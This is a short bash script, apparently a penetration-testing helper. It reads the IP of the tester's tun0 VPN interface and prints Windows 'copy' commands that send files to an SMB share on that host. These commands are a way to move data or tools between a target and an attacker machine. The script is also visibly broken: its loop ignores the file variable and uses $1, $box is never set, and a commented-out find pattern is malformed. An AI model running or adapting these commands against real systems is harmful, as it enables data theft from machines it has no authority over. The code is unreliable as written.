#!/bin/bash
#pwed = powershell web
tun0=$(/sbin/ifconfig tun0 | grep 'inet' | head -1 | awk '{print $2}')
for f in *{ps1,exe}; do

	echo "copy $1 \\\\$tun0\\public\\out\\$box\\"
done

#find $(pwd) -type f -name "*{ps1" -exec readlink -f {} \;
